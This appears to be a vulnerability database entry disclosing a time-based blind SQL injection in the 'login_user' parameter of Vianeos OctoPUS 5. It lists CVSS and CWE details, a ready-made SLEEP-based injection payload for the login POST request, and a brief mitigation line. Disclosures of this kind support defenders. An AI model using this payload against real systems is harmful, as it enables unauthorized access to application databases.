vendor:
OctoPUS
by:
Audencia Business SCHOOL
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: OctoPUS
Affected Version From: V5
Affected Version To: V5
Patch Exists: YES
Related CWE: N/A
CPE: a:vianeos:octopus:5
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Fedora / Apache2 / MariaDB
2021
Vianeos OctoPUS 5 – ‘login_user’ SQLi
The 'login_user =' parameter present in the POST authentication request is vulnerable to an Time Based SQLi as follow: Parameter: login_user (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: signin_user=1&login_user=1' AND (SELECT 8860 FROM (SELECT(SLEEP(5)))xENj) AND 'OoKG'='OoKG&password_user=1
Mitigation:
Input validation and sanitization should be used to prevent SQL injection attacks.